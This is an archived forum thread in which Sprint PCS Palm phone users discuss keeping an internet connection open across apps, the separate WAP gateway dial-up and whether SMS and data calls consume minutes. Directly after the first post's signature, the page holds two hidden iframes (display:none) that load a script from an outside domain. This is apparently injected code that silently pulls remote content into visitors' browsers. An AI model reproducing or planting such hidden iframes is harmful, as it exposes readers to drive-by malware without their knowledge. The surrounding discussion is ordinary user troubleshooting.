+ Reply to Thread

Question Share internet amongst apps

I find it somewhat annoying that you can't use your internet connection from one application to the other. For example, connecting to Instant Messenger through their app and then trying to view Sprint's wireless web. I'd rather spare myself the time of having to sign off and then re sign-on. Has anyone found a way to avoid this? Am I missing something?

Thanks.
    -Gary<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I routinely switch from Eudora to Blazer to AIM without severing my internet connection. Just make sure you uncheck the option in each app to disconnect when done.

Where is it found

AIM doens't disconnect when I leave it. But when I fire up sprintweb it doesn't seem to realize i already have a connection and fails at connecting. When i'm connected to sprintweb, if i leave the app, it automatically disconnects me (couldn't find the option otherwise). Any thoughts?

I think it's specific to Spint's WebMail. I see the same thing when I try to go there. That may be because we're trying to access it going out of Sprint's gateway, to our ISP, then back in.
    oh, you're supposed to READ the manual....

Administrator

Arrow

using your own isp over sprints wont cause the sprint web to do that.. its a trait of the sprint web..

when you sign in to sprint web, you are not going thru the standard connection to get to the web. this is sprints own site, not available thru the web. so when you leave this site you will have to disconnect and reconnect to get to the standard web connection (#2932).

Marctronixx, can you provide some more info on this? Can you tell me if, when using Sprint's connection, you're not using up minutes? Here's my issue with it:

The phone claims to offer short-messaging. However, when I get a short-message, I have to "connect" to read it. Am I using up my minutes when I do this? If so, this negates one of the big benefits of SMS, IMO.

Scott

Does this help

I think you have to have "the wireless web", but I'm sure you do. If so, you can send short messages to <your phone number>@messaging.sprintpcs.com You do not have to connect to retreive these messages. They (semi-)instantly show up on the phone. I think you get 50 per month, included with the wireless web.

What I wonder, is if I'm able to make a data calls to my ISP, using plan minutes without "the wireless web" option. (and without an extra charge of course)

Tennis Shoe, I think you need "wireless web" to do any data calls. Since Sprint has their own ISP, it therefore doesn't make sense to me that you would choose to use another one. Regarding the SMS, the problem is that when an incoming SMS message comes in on the i300, I am alerted about it, but I can't read the actual message without connecting. I think this is different than most SMS phones, though I've never owned another SMS phone, so maybe they all work this way. I tend to doubt it.

Scott

Does this help

I think you have to have "the wireless web", but I'm sure you do. If so, you can send short messages to <your phone number>@messaging.sprintpcs.com You do not have to connect to retreive these messages. They (semi-)instantly show up on the phone. I think you get 50 per month, included with the wireless web.

What I wonder, is if I'm able to make a data calls to my ISP, using plan minutes without "the wireless web" option. (and without an extra charge of course)

No connection required

The message dialog that opens on the phone gives the option to call back whoever sent the message (assuming they leave a call back number), but you do not have to connect to get the message. Sending a short email from a PC to the phone using the above address works, I just tried it to make sure.

Sorry for the duplicate post, and thanks for the wireless web answer (I figured I had to have it, just making sure.)

Administrator

Arrow

yes you need wireless web to use any "data" calls...

somoene CAN sen you a "numeric" page to the XXX@messaging... and it will show up on the phone and you dont haver to connect to read the numeric page...

but any kind of SMS usage you will need to be connected to the sprints web thingy. its the way they make money off of it... verizon has sms and you have to pay for that so it depends on the carrier how they "get you"...

and whenever you see "dialing sprintpcs".. it is going against your minutes... :p

Correction

Your right. I saw the subject line come to my phone, and did not actually get the whole email. I guess you could send up to a 156 charactor text message (use the subject field the email) to the phone, but I guess thats kinda crazy.

Actual Tennis, if what you're saying about the subject line is true, I may be able to work with that. I could just make sure my wife sends me SMS messages that way.

Scott

The "Sprint Wireless Web" application is an Openwave.com
    4.1.22c.1 WAP browser, it utilizing a different dialup number to connect directly to the Sprint PCS WAP gateway than the dialup number used by other internet connects, i.e., the #2WEB (#2932) connection visible in the Network Connection panel.

This connection is separate and will only allow IP packet traffic from the handset to the Sprint PCS WAP gateway IP address.

You should be able to switch back and forth between any other Internet enabled Palm OS applications with the exception of this WAP browser; it will always require an existing connectioj to be torn down as it requires a different dialup number.

So, jackthehack, can you confirm that this separate number will still use up voice minutes?

Scott

To the best of my knowlege, all data calls, initiated by starting the
    "Sprint Web" WAP browser or #2932 dialup with the Blazer browser or other web-enabled Palm OS applications incur DATA minutes, NOT voice minutes....

This can be somewhat confusing. Yes, it is a data call (which means that you have to have the $5/month web access option). However, once you've done this, all data calls come out of your voice minutes. I believe this applies to this as well. My concern, is that I believe on other SMS capable phones (the GSM VisorPhone, for instance), SMS messages come across in their entirety, without requiring any dialing in to anything to read the message. Hence, you're not using up your minutes.

Scott